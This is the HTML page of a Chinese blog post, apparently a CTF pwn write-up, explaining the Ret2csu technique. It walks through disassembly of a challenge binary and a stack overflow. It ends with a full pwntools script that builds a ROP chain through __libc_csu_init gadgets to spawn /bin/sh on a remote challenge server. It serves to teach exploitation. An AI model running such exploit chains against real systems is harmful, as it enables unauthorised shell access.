  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_a0oqhord1y';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://example.com';</script>
  <title>
    Ret2csu | 雾島风起時
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_a0oqhord1y.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="Ret2csu原理在 glibc 的源码中，有一个函数叫 __libc_csu_init，它在程序启动时负责调用 .init_array 中的初始化函数 这个函数末尾有一段普适性很强的指令，经常被用作 ROP gadget。安全研究者最早将利用这段代码的技术称为 Return-to-csu，简称 Ret2csu。 因为 __libc_csu_init 是 libc 标准启动代码的一部分，只要程序是">
<meta property="og:type" content="article">
<meta property="og:title" content="Ret2csu">
<meta property="og:url" content="http://example.com/2019/05/22/Ret2csu/index.html">
<meta property="og:site_name" content="雾島风起時">
<meta property="og:description" content="Ret2csu原理在 glibc 的源码中，有一个函数叫 __libc_csu_init，它在程序启动时负责调用 .init_array 中的初始化函数 这个函数末尾有一段普适性很强的指令，经常被用作 ROP gadget。安全研究者最早将利用这段代码的技术称为 Return-to-csu，简称 Ret2csu。 因为 __libc_csu_init 是 libc 标准启动代码的一部分，只要程序是">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2d8258f684928e3d6bc99a.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2d8d9af684928e3d6bdae2.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2d8da9f684928e3d6bdae3.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2d9309f684928e3d6bdb37.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2d9506f684928e3d6bdb4e.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2dac5df684928e3d6c1026.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2e68e802f2532807685ae1.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/6a2e1e81f684928e3d6d452b.png">
<meta property="article:published_time" content="2019-05-22T06:23:00.000Z">
<meta property="article:modified_time" content="2026-06-14T15:38:03.570Z">
<meta property="article:author" content="ALL">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/6a2d8258f684928e3d6bc99a.png">
    <link rel="alternate" href="/atom.xml" title="雾島风起時" type="application/atom+xml">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/archives">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/about">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">关于</span>
        </a>
        <a class="main-nav-link-wrap" href="/friend">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">友链</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" aria-label="RSS 订阅" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
        <picture>
        </picture>
          <img  fetchpriority="high" src="/images/banner.webp" alt="Ret2csu">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">Ret2csu</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ret2csu"><span class="toc-number">1.</span> <span class="toc-text">Ret2csu</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B"><span class="toc-number">1.2.</span> <span class="toc-text">实战案例</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Pwn%E9%A2%98%E6%BB%9E%E9%94%80-%E5%B8%AE%E5%B8%AE%E6%88%91%E5%A5%BD%E5%90%97-%EF%BC%88Ret2csu%EF%BC%89"><span class="toc-number">1.2.1.</span> <span class="toc-text">Pwn题滞销,帮帮我好吗_（Ret2csu）</span></a></li></ol></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">148</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">20</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">171</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-Ret2csu" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2019-05-22T06:23:00.000Z" itemprop="datePublished">2019-05-22</time>
    <time style="display: none;" id="post-update-time">2026-06-14</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h1 id="Ret2csu"><a href="#Ret2csu" class="headerlink" title="Ret2csu"></a>Ret2csu</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>在 glibc 的源码中，有一个函数叫 <code>__libc_csu_init</code>，它在程序启动时负责调用 <code>.init_array</code> 中的初始化函数</p>
<p>这个函数末尾有一段普适性很强的指令，经常被用作 ROP gadget。安全研究者最早将利用这段代码的技术称为 Return-to-csu，简称 Ret2csu。</p>
<p>因为 <code>__libc_csu_init</code> 是 libc 标准启动代码的一部分，只要程序是动态链接的，几乎一定存在，而且在没有 PIE 的情况下地址固定。这给了攻击者在 “找不到常规 pop rdi” 时一个可靠的备胎</p>
<h2 id="实战案例"><a href="#实战案例" class="headerlink" title="实战案例"></a>实战案例</h2><h3 id="Pwn题滞销-帮帮我好吗-（Ret2csu）"><a href="#Pwn题滞销-帮帮我好吗-（Ret2csu）" class="headerlink" title="Pwn题滞销,帮帮我好吗_（Ret2csu）"></a>Pwn题滞销,帮帮我好吗_（Ret2csu）</h3><p><img src="https://pic1.imgdb.cn/item/6a2d8258f684928e3d6bc99a.png"></p>
<p>代码只有两行</p>
<p><img src="https://pic1.imgdb.cn/item/6a2d8d9af684928e3d6bdae2.png"></p>
<p>进入 <code>sub_401132()</code> 函数，看不出来啥问题</p>
<p><img src="https://pic1.imgdb.cn/item/6a2d8da9f684928e3d6bdae3.png"></p>
<p>查看伪代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">push    rbp             ; 保存父函数的栈底（Old RBP）</span><br><span class="line">mov     rbp, rsp        ; 建立当前函数的栈底</span><br><span class="line">sub     rsp, <span class="number">20</span>h        ; 在栈上只开辟了 <span class="number">0x20</span>（<span class="number">32</span> 字节）的空间</span><br><span class="line"></span><br><span class="line">mov     rsi, rsp        ; 参数 <span class="number">2</span> (buf)：把刚刚开辟的栈顶地址，作为写入数据的起点</span><br><span class="line">mov     rdi, <span class="number">0</span>          ; 参数 <span class="number">1</span> (fd)：<span class="number">0</span> 代表标准输入</span><br><span class="line">mov     rdx, <span class="number">100</span>h       ; 参数 <span class="number">3</span> (count)：允许读入多达 <span class="number">0x100</span>（<span class="number">256</span> 字节）</span><br><span class="line"></span><br><span class="line">mov     rbx, <span class="number">0</span>          ; \</span><br><span class="line">push    rbx             ; 这三行连招的最终目的：让 RAX = <span class="number">0</span></span><br><span class="line">pop     rax             ; /   （<span class="number">0</span> 号系统调用 = sys_read 读入函数）</span><br><span class="line"></span><br><span class="line">syscall    ; 触发系统调用</span><br><span class="line"></span><br><span class="line">add     rsp, <span class="number">20</span>h        ; 恢复栈指针，释放之前开辟的 <span class="number">32</span> 字节空间</span><br><span class="line">nop        ; 空指令，用于内存对齐</span><br><span class="line">pop     rbp             ; 恢复父函数栈底</span><br><span class="line">retn       ; 执行返回：弹出栈顶数据到 RIP</span><br></pre></td></tr></table></figure>

<p>使用 Pwndbg 动态调试，<code>pwn cyclic</code> 生成垃圾数据</p>
<p><img src="https://pic1.imgdb.cn/item/6a2d9309f684928e3d6bdb37.png"></p>
<p><code>rsi</code> 寄存器在伪代码中为参数 <code>buf</code> 的地址，值为 <code>0x7fffffffda80</code></p>
<p><code>rsp</code> 寄存器指向返回地址，值为 <code>0x7fffffffdaa8</code></p>
<p>我们用这两个真实的动态地址做一下减法，得到要覆盖的垃圾数据为 40 个字节</p>
<p><img src="https://pic1.imgdb.cn/item/6a2d9506f684928e3d6bdb4e.png"></p>
<p>因为没有后门，所以我们需要调用 <code>syscall</code> 并让系统去执行 <code>execve(&quot;/bin/sh&quot;, 0, 0)</code></p>
<p>为了启动这个 <code>syscall</code>，Linux 规定了死命令，必须提前在寄存器里摆好参数：</p>
<ul>
<li><p><code>rax</code> 寄存器里必须是 59（调用 <code>execve</code> 函数）</p>
</li>
<li><p><code>rdi</code> 寄存器里必须是 <code>&quot;/bin/sh&quot;</code> 字符串的内存地址</p>
</li>
<li><p><code>rsi</code> 寄存器里必须是 0</p>
</li>
<li><p><code>rdx</code> 寄存器里必须是 0</p>
</li>
</ul>
<p>我们可以利用程序里的残余指令，比如 <code>pop rdi; ret</code>。但是查了一遍没给，可惜可惜</p>
<p><img src="https://pic1.imgdb.cn/item/6a2dac5df684928e3d6c1026.png"></p>
<p>先来计算 <code>/bin/sh</code> 的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">地址        | 字符</span><br><span class="line">--------------------</span><br><span class="line">0x402004   | [</span><br><span class="line">           | !</span><br><span class="line">           | ]</span><br><span class="line">           |  (空格)</span><br><span class="line">           | C</span><br><span class="line">           | a</span><br><span class="line">           | n</span><br><span class="line">           |  (空格)</span><br><span class="line">           | U</span><br><span class="line">           |  (空格)</span><br><span class="line">           | G</span><br><span class="line">           | e</span><br><span class="line">           | t</span><br><span class="line">           |  (空格)</span><br><span class="line">           | t</span><br><span class="line">           | h</span><br><span class="line">           | e</span><br><span class="line">           |  (空格)</span><br><span class="line">--------------------</span><br><span class="line">共计 18 个字符</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/6a2e68e802f2532807685ae1.png"></p>
<p>所以起始地址就是 <code>0x402016</code></p>
<p>虽然常规的 <code>pop rdi</code> 没了，但只要是 C 语言编译的程序，系统都会默认自带一个初始化功能，叫 <code>__libc_csu_init</code></p>
<p>在 <code>__libc_csu_init</code> 函数的尾部，躺着两段连续的汇编指令</p>
<p><img src="https://pic1.imgdb.cn/item/6a2e1e81f684928e3d6d452b.png"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">0x4011F2</span>    pop     rbx       ; 弹出给 rbx</span><br><span class="line">.text:<span class="number">0x4011F3</span>    pop     rbp       ; 弹出给 rbp</span><br><span class="line">.text:<span class="number">0x4011F4</span>    pop     r12       ; 弹出给 r12</span><br><span class="line">.text:<span class="number">0x4011F6</span>    pop     r13       ; 弹出给 r13</span><br><span class="line">.text:<span class="number">0x4011F8</span>    pop     r14       ; 弹出给 r14</span><br><span class="line">.text:<span class="number">0x4011FA</span>    pop     r15       ; 弹出给 r15</span><br><span class="line">.text:<span class="number">0x4011FC</span>    retn              ; 弹回栈顶地址继续执行</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">0x4011D8</span>    mov     rdx, r14</span><br><span class="line">.text:<span class="number">0x4011DB</span>    mov     rsi, r13</span><br><span class="line">.text:<span class="number">0x4011DE</span>    mov     edi, r12d</span><br><span class="line">.text:<span class="number">0x4011E1</span>    call    qword ptr [r15+rbx*<span class="number">8</span>]</span><br><span class="line">.text:<span class="number">0x4011E5</span>    add     rbx, <span class="number">1</span></span><br><span class="line">.text:<span class="number">0x4011E9</span>    cmp     rbp, rbx</span><br><span class="line">.text:<span class="number">0x4011EC</span>    jnz     <span class="type">short</span> loc_4011D8</span><br></pre></td></tr></table></figure>

<p>思路如下：</p>
<ul>
<li><p><code>pop rbx</code>：这里的结果会影响到最后的 <code>call qword ptr [r15+rbx*8]</code>，因为 <code>r15</code> 本身就由我们控制。选择填 0，这样就直接调用 <code>r15</code> 指向的函数</p>
</li>
<li><p><code>pop rbp</code>：这里的结果会影响到后面的 <code>cmp rbp, rbx</code>，再判断之前就已经 <code>add rbx, 1</code> 了，所以要填入 1，不然会重新循环</p>
</li>
<li><p><code>pop r12</code>：这里的结果会影响到后面的 <code>mov edi, r12d</code>，<code>edi</code> 就是 <code>rdi</code>，填入 <code>/bin/sh</code> 地址</p>
</li>
<li><p><code>pop r13</code>：这里的结果会影响到后面的 <code>mov rsi, r13</code>，也就是 <code>execve(&quot;/bin/sh&quot;, 0, 0)</code> 第二个参数，填 0</p>
</li>
<li><p><code>pop r14</code>：同理，这里是第三个参数，填 0</p>
</li>
<li><p><code>pop r15</code>：这里的结果会影响到后面的 <code> call qword ptr [r15+rbx*8]</code>，因为 <code>call</code> 必须得给一个真实的函数地址，否则会报错。我们选择 <code>alarm</code>，调用它只是定个闹钟</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&#x27;A&#x27;</span> * <span class="number">40</span>              <span class="comment"># 垃圾数据填满栈空间</span></span><br><span class="line">payload += p64(<span class="number">0x4011F2</span>)         <span class="comment"># 进入 pop 段</span></span><br><span class="line">payload += p64(<span class="number">0</span>)                <span class="comment"># pop rbx = 0</span></span><br><span class="line">payload += p64(<span class="number">1</span>)                <span class="comment"># pop rbp = 1 (为了 1==1 破循环)</span></span><br><span class="line">payload += p64(bin_sh)           <span class="comment"># pop r12 -&gt; 将送给 edi (参数 1)</span></span><br><span class="line">payload += p64(<span class="number">0</span>)                <span class="comment"># pop r13 -&gt; 将送给 rsi (参数 2)</span></span><br><span class="line">payload += p64(<span class="number">0</span>)                <span class="comment"># pop r14 -&gt; 将送给 rdx (参数 3)</span></span><br><span class="line">payload += p64(alarm_got)        <span class="comment"># pop r15 -&gt; 作为 call 目标</span></span><br><span class="line">payload += p64(<span class="number">0x4011D8</span>)        <span class="comment"># 完成参数搬运与 call</span></span><br></pre></td></tr></table></figure>

<p>到跳转到 <code>0x4011D8</code> 处时，执行过程如下</p>
<ul>
<li><p><code>rdx</code> 与 <code>rsi</code> 为 0，<code>rdi</code> 为 <code>/bin/sh</code> 地址</p>
</li>
<li><p><code>call alarm</code>，<code>r15</code> 被填充为了 <code>alarm</code> 函数地址</p>
</li>
<li><p>比较 <code>rbp</code> 和 <code>rbx</code>，相等则进去进入 <code>0x4011EE</code> 中执行</p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">0x4011EE</span>    add     rsp, <span class="number">8</span></span><br><span class="line">.text:<span class="number">0x4011F2</span>    pop     rbx</span><br><span class="line">.text:<span class="number">0x4011F3</span>    pop     rbp</span><br><span class="line">.text:<span class="number">0x4011F4</span>    pop     r12</span><br><span class="line">.text:<span class="number">0x4011F6</span>    pop     r13</span><br><span class="line">.text:<span class="number">0x4011F8</span>    pop     r14</span><br><span class="line">.text:<span class="number">0x4011FA</span>    pop     r15</span><br><span class="line">.text:<span class="number">0x4011FC</span>    retn</span><br></pre></td></tr></table></figure>

<p>这样又进入了 <code>pop</code> 段中，但是我们已经不需要了，所以填充垃圾数据进去</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">7</span>  <span class="comment"># 抵消掉这 1 个 add 和 6 个 pop 的干扰</span></span><br></pre></td></tr></table></figure>

<p>此时来到了最后的 <code>.text:0x4011FC  retn</code> 处，我们劫持</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(pop_rax_syscall)</span><br><span class="line">payload += p64(<span class="number">59</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./main&#x27;</span>)</span><br><span class="line">io = remote(<span class="string">&#x27;49.232.142.230&#x27;</span>, <span class="number">11962</span>)</span><br><span class="line"></span><br><span class="line">gadget_1 = <span class="number">0x4011F2</span>              <span class="comment"># CSU 尾部的 pop 区域入口</span></span><br><span class="line">gadget_2 = <span class="number">0x4011D8</span>              <span class="comment"># CSU 中部的 mov/call 区域入口</span></span><br><span class="line">bin_sh_addr = <span class="number">0x402016</span>           <span class="comment"># &quot;/bin/sh&quot; 字符串首地址</span></span><br><span class="line">alarm_got = elf.got[<span class="string">&#x27;alarm&#x27;</span>]     <span class="comment"># 闹钟函数的 GOT 真实地址</span></span><br><span class="line"></span><br><span class="line">pop_rax_syscall = <span class="number">0x401153</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span> * <span class="number">40</span></span><br><span class="line">payload += p64(gadget_1)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(<span class="number">1</span>)</span><br><span class="line">payload += p64(bin_sh_addr)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(alarm_got)</span><br><span class="line">payload += p64(gadget_2)        </span><br><span class="line"></span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">7</span>           </span><br><span class="line"></span><br><span class="line">payload += p64(pop_rax_syscall) </span><br><span class="line">payload += p64(<span class="number">59</span>)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
    </div>
    <footer class="article-footer">
        <a class="article-category-link" href="/categories/Pwn/" title="Pwn" data-aos="zoom-in">Pwn</a>

        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Pwn/" rel="tag" title="Pwn">Pwn</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
            <img data-src="/images/banner.webp" data-sizes="auto" alt="2020 0xGame WriteUp" class="lazyload">
        <a href="/2020/04/14/2020%200xGame/" aria-label="前一篇: 2020 0xGame WriteUp" title="前一篇: 2020 0xGame WriteUp"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            2020 0xGame WriteUp
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
          <img data-src="/images/banner.webp" data-sizes="auto" alt="MFC" class="lazyload">
      <a href="/2019/05/22/MFC/" aria-label="后一篇: MFC"  title="后一篇: MFC"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          MFC
      </h3>
    </div>
  </nav>

</article>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        <span class="footer-info-sep rotate"></span>
      ALL
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        146.5k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        12:14
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
